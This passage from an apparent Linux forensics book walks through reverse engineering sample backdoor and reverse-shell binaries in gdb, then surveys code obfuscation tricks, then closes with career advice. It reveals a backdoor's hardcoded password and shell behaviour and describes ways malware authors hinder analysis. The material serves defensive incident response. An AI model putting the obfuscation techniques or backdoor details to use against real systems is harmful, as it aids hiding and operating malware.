If you type help info in gdb, you will get a long list of things that the debugger will report on. One of these items is functions. Running info functions with xingyi_bindshell loaded in the debugger produces a long list, some of which is shown in Figure 10.27. Functions are displayed along with their addresses. Incidentally, gdb commands can be abbreviated as long as they are not ambiguous. Typing inf fun would have returned the same results.
FIGURE 10.27
Partial results from running info functions in gdb.
As mentioned previously, gdb can be used to disassemble a program. The command for disassembling a function is just disassemble <function name or address>, e.g. disassemble main. The command can be shortened to disas. Before running this command, you might wish to switch from the default AT&T syntax to the more common Intel syntax. To do so, issue the command set disassembly-flavor intel. Partial results from disassembling main are shown in Figure 10.28. Note that, unlike the output from objdump shown in Figure 10.15, the main function ends at 0x401312.
FIGURE 10.28
Partial results from disassembling main in gdb.
If, after viewing the disassembly of various functions, you decide to run the program (in your sandbox!), you may wish to set at least one breakpoint. The command to set a breakpoint is simply break <address or function name>. If you supply a function name, the breakpoint is set at the beginning of the function. The command info break lists breakpoints. To delete a breakpoint, type delete <breakpoint number>. The run command will start the program and run everything up to the first breakpoint (if it exists). Typing disassemble with no name or address after it will disassemble a few lines after the current execution point. These commands are illustrated in Figure 10.29.
FIGURE 10.29
Breakpoint management commands.
If you are stopped at a breakpoint, you can take off running again to the next breakpoint, if any, with continue. You may also use stepi and nexti to execute the next Assembly instruction and execute the next Assembly instruction while stepping over any functions encountered, respectively. When stepping through a program, you can just hit the <enter> key, as this causes gdb to repeat the last command. The use of these stepping functions is demonstrated in Figure 10.30.
FIGURE 10.30
Using stepping functions in gdb.
As you are tracing through a program, you might want to examine different chunks of memory (especially the stack) and various registers. The x (examine) command is used for this purpose. The help for x and the first twenty giant values (8 bytes) on the stack in hexadecimal (gdb command x/20xg $rsp) are shown in Figure 10.31. Note that because the stack grows downward, it is much easier to display in the debugger.
FIGURE 10.31
Using the examine command in gdb.
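To make the giant-word format concrete, the sketch below decodes raw memory into the same 8-byte little-endian values that x/20xg prints on a 64-bit x86 system. The function name giant_words and the sample bytes are assumptions made for illustration; they are not taken from the figure.

```python
import struct


def giant_words(raw: bytes) -> list:
    """Split raw memory into 8-byte little-endian unsigned integers."""
    usable = len(raw) - (len(raw) % 8)  # ignore any trailing partial word
    count = usable // 8
    return list(struct.unpack("<%dQ" % count, raw[:usable]))


if __name__ == "__main__":
    # Hypothetical 16 bytes of stack memory, lowest address first
    sample = bytes.fromhex("d010600000000000" "611e000000000000")
    for index, value in enumerate(giant_words(sample)):
        print("rsp+0x%02x: 0x%016x" % (index * 8, value))
```

Because x86 is little-endian, the byte at the lowest address is the least significant byte of each value, which is why the bytes d0 10 60 in memory are displayed as 0x6010d0.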
The command info registers displays all the registers, as shown in Figure 10.32. Note that if you are running a 32-bit executable, the registers will be named EXX, not RXX, as described earlier in this chapter. For reverse engineering, the RBP, RSP, and RIP (base, stack, and instruction pointers, respectively) are the most important.
FIGURE 10.32
Examining registers in gdb.
Let’s turn our focus to xingyi_rootshell, now that we have learned some of the basics of using gdb. First, we load the program with gdb xingyi_rootshell. Next, we set a breakpoint at the start of main by typing break main. If you prefer Intel syntax, issue the command set disassembly-flavor intel. To run the program with command line argument(s), append the argument(s) to the run command, e.g. run sw0rdm4n. This sequence of instructions is shown in Figure 10.33.
FIGURE 10.33
Running xingyi_rootshell in gdb.
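The same sequence of gdb commands can be replayed without typing it each time by using gdb's -batch and -ex command line options. The following is a minimal sketch that only builds and prints the command line; the names SESSION and build_gdb_command are assumptions made for illustration.

```python
import shlex

# The gdb commands used in the walkthrough, in order
SESSION = [
    "set disassembly-flavor intel",
    "break main",
    "run sw0rdm4n",
    "disassemble",
]


def build_gdb_command(binary, gdb_commands=SESSION):
    """Build an argv list that runs gdb non-interactively.

    -batch makes gdb exit after processing its commands and each
    -ex option supplies one command to execute.
    """
    argv = ["gdb", "-batch"]
    for command in gdb_commands:
        argv.extend(["-ex", command])
    argv.append(binary)
    return argv


if __name__ == "__main__":
    argv = build_gdb_command("xingyi_rootshell")
    # Print a copy-and-paste friendly shell command
    print(" ".join(shlex.quote(part) for part in argv))
```

Passing the resulting list to subprocess.run would start the suspect binary under gdb, so do that only inside your sandbox.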
Running disassemble results in the disassembly of the current function, complete with a pointer to the next instruction to be executed. The disassembly of main is shown in Figure 10.34. There are a few things that are readily apparent in this snippet. Thirty-two bytes (0x20) of space are allocated on the stack for local variables. Memory is then allocated on the heap with a call to n_malloc. Two addresses (one from the stack and one inside the program) are loaded into RAX and RDX, and then strcmp is used to compare the two strings stored at these locations. Of significance here is that this snippet makes it clear this embedded string is some sort of password.
FIGURE 10.34
Disassembly of the xingyi_rootshell main function.
If we did not yet realize that this embedded value was a password, we could use the command x/s *0x6010d0 to display this password, as shown in Figure 10.35. Note that this is extra easy because the binary was not stripped and had a descriptive name for this variable. Even if it were stripped, the fact that an address is referenced relative to RIP indicates a variable that is embedded in the program binary. We see the argument to the system function call is loaded from address 0x400B9C. If we examine this with x/s 0x400b9c, we see that a bash shell is being started.
FIGURE 10.35
Using gdb to determine the program password and target of system call.
What about the xingyi_reverse_shell? We can do a quick analysis by following the same procedure. First, we load it in gdb with gdb xingyi_reverse_shell. Next, we set a breakpoint in main with break main. Optionally, we set the disassembly flavor to Intel with set disassembly-flavor intel. We can run the program with a parameter using run 127.0.0.1. At this stage, the program should be stopped just inside of the main function and typing disassemble will produce the output shown in Figure 10.36.
FIGURE 10.36
Disassembling main from xingyi_reverse_shell in gdb.
Breaking down the disassembly in Figure 10.36, we can see that this function is fairly simple. Thirty-two (0x20) bytes of space are allocated on the stack. The number of command line parameters and the address of the parameter list are stored in [RBP-0x14] and [RBP-0x20], respectively. If the number of command line parameters is greater than 1 (recall that the program name is counted here), then we jump over the line call <_print_usage>. The address of the second command line argument (located at the start of this list + 0x8 to skip the 8-byte pointer for the first argument) is loaded into RDI and validate_ipv4_octet is called. If we did not already know that this command line parameter was supposed to be an IP address, this code snippet would help us figure it out. Again, if the binary were stripped, we would need to work a little harder and investigate the function at 0x400AC5 to figure out what it does. If this function doesn’t return success, _print_usage is called.
Assuming everything is still good, the daemonize function is called. Once again, if the binary had been stripped of this descriptive name, we would have to work a bit harder and delve into the daemonize function to determine its purpose. We see another address referenced relative to RIP. Here a parameter for _writepid_to_file is being loaded from address 0x6020B8. Running the command x/s *0x6020b8 reveals this string to be “/tmp/xingyi_reverse_pid”. This and the remainder of the disassembly of main are shown in Figure 10.37.
FIGURE 10.37
Second half of disassembly of main in xingyi_reverse_shell.
We can see that fwrite is called a couple of times and that _log_file is also called. If we examine the values referenced in Figure 10.37, we will see that 0x6020B0 contains the value 0x1E61 (7777) and 0x6020C8 contains the string “/tmp/xingyi_reverse.port”. It was fairly easy to determine what these three binaries do because the author made no attempt to obfuscate the code. The filenames, function names, variable names, etc. made this process easy. What if a malware author is trying to make things hard to detect and/or understand?
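Converting a value such as 0x1E61 by hand is error prone, so a quick check in Python is worthwhile. The sketch below also shows how the same port number looks in network (big-endian) byte order, which is how port numbers appear in socket address structures; the function name describe_port is an assumption made for illustration.

```python
import struct


def describe_port(raw_value: int) -> dict:
    """Show one 16-bit value as decimal, hex, and network-order bytes."""
    return {
        "decimal": raw_value,
        "hex": hex(raw_value),
        # Ports are transmitted in network (big-endian) byte order
        "network_bytes": struct.pack("!H", raw_value),
    }


if __name__ == "__main__":
    print(describe_port(0x1E61))
```

Recognizing both forms helps when a port number shows up in a memory dump rather than as a named variable.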
OBFUSCATION
There are a number of methods malware authors will use in order to obfuscate their programs. The level of sophistication varies widely. One of the most pedestrian ways to slow down the reverse engineer is to use a packer. A packer can be utilized to compress a binary on disk and, in some cases, speed up the loading process. A packer compresses an existing program, and then inserts executable code to reverse the process and uncompress the program into memory.
The Ultimate Packer for Executables (UPX) is a very popular cross-platform packer available at http://upx.sourceforge.net. If executing the command grep UPX <file> generates any hits, then you might be dealing with a file packed by UPX. If you get a hit, download the UPX package and decompress the file with the -d option. The first bytes in a file packed with UPX are shown in Figure 10.38.
FIGURE 10.38
The first part of a file packed with UPX.
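The grep check described above is easy to reproduce in Python when you want to scan many files from a script. This is a minimal sketch that looks only for the literal bytes UPX, exactly as grep would; the function name contains_marker is an assumption, and a hit is a hint rather than proof that the file is packed.

```python
def contains_marker(path, marker=b"UPX", chunk_size=65536):
    """Return True if the byte string marker occurs anywhere in the file."""
    overlap = len(marker) - 1
    tail = b""
    with open(path, "rb") as handle:
        while True:
            chunk = handle.read(chunk_size)
            if not chunk:
                return False
            window = tail + chunk
            if marker in window:
                return True
            # Keep the last few bytes so a marker split across
            # two chunks is still found on the next pass
            tail = window[-overlap:] if overlap else b""


if __name__ == "__main__":
    import sys

    for name in sys.argv[1:]:
        print(name, contains_marker(name))
```

Reading in chunks keeps memory use small on large binaries, and the overlap handling avoids missing a marker that happens to straddle a chunk boundary.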
In the past, clever malware authors might have written self-modifying code that changes as it is executed. This was quite easily done with DOS systems that had no memory protection whatsoever. In the modern world, even Windows will mark executable memory blocks as read-only, making this obfuscation method a thing of the past.
Modern day compilers benefit from decades of research and do a great job of optimizing code. Optimized code is also very uniform, which allows it to be more easily reverse engineered. As a result, obfuscated code is likely handwritten in Assembly. This is both good and bad. The good thing is that you have to be a skilled Assembly coder to write malware this way. The bad thing is that you have to be a skilled Assembly coder to interpret and follow the code! Again, for the purposes of incident response, if you encounter code using the obfuscation techniques discussed in this section, it is probably malware. There are some paranoid companies that obfuscate their products in order to discourage reverse engineering, but those products are few and far between on the Linux platform.
So what sorts of things might one do to obfuscate Assembly code? How about using obscure Assembly instructions? In this chapter, we have covered just a handful of Assembly instructions. Yet this is enough to get a high-level view of what is happening in most programs. Start using uncommon operations, and even experienced Assembly coders are running to Google and their reference manuals.
Compilers are smart enough to replace calculations involving only constants with the answers. For example, if I want to set a flag in position 18 in a bit vector, and I write x = 2 ^ 17 (2 raised to the power 17) or x = 1 << 17, this will be replaced with x = 0x20000. If you see calculations involving only constants that are known at compile time, suspect obfuscation (or poorly written Assembly).
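The arithmetic in this example is easy to verify, and Python can also be used to observe constant folding in action. The sketch below assumes the CPython interpreter, whose compiler folds simple constant expressions; the exact contents of the constants tuple vary between versions, and the function name folded_constants is an assumption made for illustration.

```python
def folded_constants(source: str) -> tuple:
    """Compile a statement and return the constants stored in its code object."""
    return compile(source, "<example>", "exec").co_consts


if __name__ == "__main__":
    # In Python ** is exponentiation; ^ is XOR, unlike the shorthand in the text
    print(2 ** 17 == 1 << 17 == 0x20000)
    # On CPython the folded result 131072 appears among the constants,
    # showing that the shift was computed at compile time
    print(folded_constants("x = 1 << 17"))
```

A C compiler performs the same kind of replacement, which is why a run-time calculation on constants in a disassembly is a sign that the code did not come straight from an optimizing compiler.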
Authors may also intentionally insert dead code that is never called in order to throw the reverse engineer off track. I once worked for a company that had written their PC software product in COBOL (yes, I was desperate for a job when I took that one). The primary author of their main product had inserted thousands of lines of COBOL that did absolutely nothing. I discovered this when I ported the program to C++. Incidentally, the complete COBOL listing required an entire box of paper. The C++ program was less than 200 pages long, despite running on three operating systems in graphical or console mode (the old program was DOS and console only).
Authors might also insert several lines of code that are easily replaced by a single line. One of the techniques is to employ an intermediate variable in every calculation even when this is unnecessary. Another trick is to use mathematical identities when making assignments.
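Both tricks can be seen in a small Python sketch. The two functions below are hypothetical examples written for illustration, not code recovered from any malware. The second one hides a simple addition behind needless intermediate variables and the identity a + b = (a XOR b) + 2 * (a AND b).

```python
def add_plain(a: int, b: int) -> int:
    """The straightforward version: a single line."""
    return a + b


def add_obfuscated(a: int, b: int) -> int:
    """The same addition, disguised with extra steps."""
    t1 = a ^ b    # sum of the bits, ignoring carries
    t2 = a & b    # positions where a carry is generated
    t3 = t2 << 1  # carries moved into place (2 * t2)
    t4 = t1 + t3  # needless intermediate before returning
    return t4


if __name__ == "__main__":
    print(add_plain(1200, 34), add_obfuscated(1200, 34))
```

When you meet a sequence like this in a disassembly, working a couple of small values through it by hand, or in a script like this one, is often the fastest way to recognize the simple operation underneath.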
One of the few techniques that still works when programming in a high level language is function inlining. If you look back in this chapter, you will see that a lot of the information we gleaned from our unknown binaries was based on tracing through what functions were called locally (looking at disassembly), in libraries (ltrace), and system calls (strace). Inlining turns a program into one big function. The one big function will still have library and system calls but will be noticeably harder to grasp.
SUMMARY
In this chapter we discussed how to determine if unknown files are malicious. We even covered the basics of reverse engineering. With this chapter, we have now covered every major topic in the world of Linux forensics. In the next chapter we will discuss taking Linux forensics to the next level.
CHAPTER 11
The Road Ahead
INFORMATION IN THIS CHAPTER:
Next steps
Communities
Learning more
Congregate
Certify?
NOW WHAT?
You’ve read through this entire book and worked through the sample images. Now what? The world of information security is a big place. The subfield of forensics is also vast. While we have covered everything you need to know for a typical Linux incident response, we have only scratched the surface of forensics knowledge. Perhaps you have done a handful of real Linux investigations. A natural question to ask is, “Where do I go from here?”
COMMUNITIES
Do not work alone. Become part of a community. If you want to limit yourself strictly to forensics, this is easier said than done. Organizations dedicated to forensics with a vibrant network of local chapters are rare. Personally, I do not see this as a bad thing. I think it is far better to get plugged in to the broader information security community. If you think about it, having friends that are experts on things like offensive security could be helpful to you in the future. You will also find many domain experts on Linux, Assembly, etc. in this community.
A good starting place might be a local DEFCON group. The list of groups (named according to phone area codes) can be found at https://www.defcon.org/html/defcon-groups/dc-groups-index.html. If you live in a large city, you might find that there is a DEFCON group in your area. What if you don’t live in a big city? E-mail the contact people from some nearby groups and ask if they know of anything going on in your area, especially anything related to forensics.
Local meetings are great. You can meet like-minded people, and often such meetings can be fun. The problem with these meetings is that they tend to be infrequent. Even monthly meetings are not enough interaction with the bigger community. This is where online communities can be extremely beneficial. When you join an online community, you have access to many experts around the world, not just people who live nearby.
A great online community to become a part of is the one at Pentester Academy (http://pentesteracademy.com). Pentester Academy goes beyond a couple of discussion forums by providing downloads related to this book and others published by their publication branch, author interaction, and a growing library of courses. Another plus of Pentester Academy is that it is not narrowly focused on the subfield of forensics.
If you are only looking for a place to have forensics discussions, you might consider giving Computer Forensics World (http://computerforensicsworld.com) a try. They offer a number of discussion forums. There is also a computer forensics community on Reddit (http://reddit.com/r/computerforensics).
LEARNING MORE
Has this book and/or a few Linux forensics investigations inspired you to learn more? You can never go wrong learning more about the fundamentals. Here is my list of fundamentals every forensics person should know:
Linux – this is the place for doing forensics, even if the subject is not running Linux
Python – this has become the de facto standard for information security people
Shell scripting – sometimes Python is overkill or has too much overhead
Assembly – a good understanding of Assembly helps you understand everything
What is the best way to learn Linux? Use it. Really use it. Run it every day as your primary operating system. Do not just run a live Linux distribution occasionally. Install Linux on your laptop. You will never learn about Linux administration from a live Linux distribution. Personally, I would stay away from a forensics-specific distribution, like SIFT. You will be much better off in the long run installing a standard version of Linux and then adding your tools. If you are not sure what to use, some member of the Ubuntu family is a good choice as there is a large community to which to turn when you want support. If, after running Linux for a few years, you decide you really want to learn Linux on a deeper level, consider installing Gentoo Linux (http://gentoo.org) on something other than your forensics workstation. Gentoo is a source-based distribution, and installing it can be simultaneously educational and extremely frustrating.
As with Linux, the best way to learn Python is to really use it. There are many books available that claim to teach you Python. The first thing you should realize is that Python can be used as a scripting language or as a programming language. Most of the books available treat Python as a programming language. What I mean by programming language is a language for writing large computer programs (say a word processor or a game). In my opinion, there are other languages that are better suited for such tasks.
To learn Python scripting requires a very hands-on approach. This is exactly what you will find in the Python course at Pentester Academy (http://www.pentesteracademy.com/course?id=1). Some might question this recommendation, given that this book is published by Pentester Academy. I was recommending this course long before I produced my first video for Pentester Academy or there was even a notion of this book, however. Some other good resources include http://learnpythonthehardway.org, http://www.codecademy.com/en/tracks/python, and http://learnpython.org.
As much as I might like Python, there are times when shell scripting is more appropriate. In general, when you primarily want to run some programs and/or do not need to do a lot of calculations, a shell script can be a good choice. Some online resources for learning shell scripting include http://linuxcommand.org, http://linuxconfig.org/bash-scripting-tutorial, and http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html. Two books on shell scripting that I would recommend are Wicked Cool Shell Scripts by Dave Taylor (2nd edition scheduled for September 2015 publication) and Classic Shell Scripting by Arnold Robbins and Nelson H. F. Beebe. The latter was published in 2005 but is still one of the best books available on this topic.
Why learn Assembly? A firm grasp of Assembly helps a person understand how computers work at the lowest level. Assembly is to computer science what calculus is to mathematics and physics. Just as knowing calculus allows you to instantly make sense of everything from your high school physics class, learning Assembly will make what goes on behind the scenes with high-level programming languages (C, C++, etc.) crystal clear.
Pentester Academy offers two courses on Assembly and shellcoding. One is for 32-bit systems and the other is for 64-bit operating systems. The 32-bit and 64-bit courses are available at http://www.pentesteracademy.com/course?id=3 and http://www.pentesteracademy.com/course?id=7, respectively. Both of these courses will provide you with a basic understanding of Assembly and go well beyond what has been covered in this book.
If you want to delve deeper into Assembly and explore topics not covered in the Pentester Academy courses mentioned above, you might enjoy Modern X86 Assembly Language Programming by Daniel Kusswurm. This book covers many topics that are not covered by the Pentester Academy courses (as these courses are focused on things used in shellcoding and reverse engineering malware). The additional topics include items such as using floating-point registers and Advanced Vector Extensions (AVX) found in new processors.
CONGREGATE
Being part of vibrant local and online communities is a great thing. Nothing beats a great conference, however. Many of the research projects I have done in the past have been a direct result of people I have met and discussions I have had at conferences around the world. Conferences are a great place to network and meet people with complementary skill sets and areas of expertise.
A good starter list of forensics conferences can be found at http://forensicswiki.org/wiki/Upcoming_events#Conferences. Forensics Magazine lists some conferences as well at http://www.forensicmag.com/events. I have not found a good master list for digital forensics conferences. You might wish to try a few Google searches to locate conferences dedicated to forensics.
There are many excellent information security conferences out there that offer something for people interested in forensics. My two favorite places to find conference listings are Concise Courses (http://concise-courses.com/security) and SECurity Organizer and Reporter Exchange (http://secore.info). SECore offers a call for papers listing with CFP closing dates for various conferences, which can be handy if you have something exciting to share with others.
Now that you have found a few conferences to attend, what should you do while you are there? Participate! If there is a forensics competition, and you have the time, consider competing. You might not win, but you are virtually guaranteed to learn a lot. Often there are people who will offer a little coaching for beginners in these competitions. Ask questions. Do not be afraid to talk to conference presenters. With very few exceptions, most are approachable and happy to talk more about their research.
Intentionally meet new people. Even if you traveled to a conference with a group, find someone you do not know with whom to have a meal at the conference. Overcome any natural tendencies toward introversion. I have attended a lot of conferences. I have yet to have a negative outcome from introducing myself and sitting with someone new over lunch. If the conference offers any mixers or networking events, attend them if at all possible. It does not take long to build a network of people whom you can leverage in a future investigation.
Now for the hardest thing to do at conferences: share. Many people falsely assume they have nothing worth sharing because they are new to information security and/or forensics. Everyone is an expert in something. Find an area you enjoy and become an expert in that area. Share your expertise with others. You will quickly find that explaining things to others enriches your own understanding.
Submitting a talk to a conference can be intimidating. Everyone gets rejected from conferences. The key is not to take it personally. A rejected talk may be more of an indicator of poor fit with a theme or other talks offered than a reflection of the quality of your submission. Many conferences will give you feedback that includes suggestions for future submissions.
Regional conferences, such as B-sides, can be a good place to start your career as a conference presenter. I’m not saying do not submit to the big conferences like DEFCON. If you feel comfortable addressing a few thousand people for your very first conference presentation, then go right ahead. If you find public speaking a bit frightening, you might want to start with a conference small enough that you will have fewer than a hundred people in the room during your talk.
CERTIFY
Generally speaking, certifications can help you get a job. This is especially true for individuals just getting started in a career. Unfortunately, many of the recognized certifications require a certain level of experience that those just starting out do not yet possess. The situation is even worse in the forensics field as some certification organizations require active full-time employment with a government entity. To further complicate things, there is no universally accepted certification in digital forensics.
In the broader field of information security, the Certified Information Systems Security Professional (CISSP) from the International Information System Security Certification Consortium (ISC)² is considered to be the standard certification all practitioners should hold in many countries, including the United States. (ISC)² offers a Certified Cyber Forensics Professional (CCFP) certification. Unlike the CISSP, the CCFP is not considered essential by many organizations. Like the CISSP, if you want to be a CCFP but you lack experience, you can take the test and become an Associate of (ISC)² who is granted the certification later after you have obtained the required experience.
Many of the forensics certifications that are not tied to government employment are issued by vendors. Given the open source nature of Linux, certifications specific to Linux forensics appear to be non-existent at this time. The net of all of this is that you should be cautious about spending money on forensics certifications unless you know they will be required for a specific job.
SUMMARY
We have covered a lot of ground in this book. I hope you have enjoyed the journey. We have laid a foundation that should help you perform investigations of Linux systems. What may not be immediately apparent is that by learning how to do forensics in Linux, you have also learned a considerable amount about how to investigate Windows systems on a Linux-based forensics workstation. That is the subject for another book. Until then, so long for now, and enjoy your Linux investigations.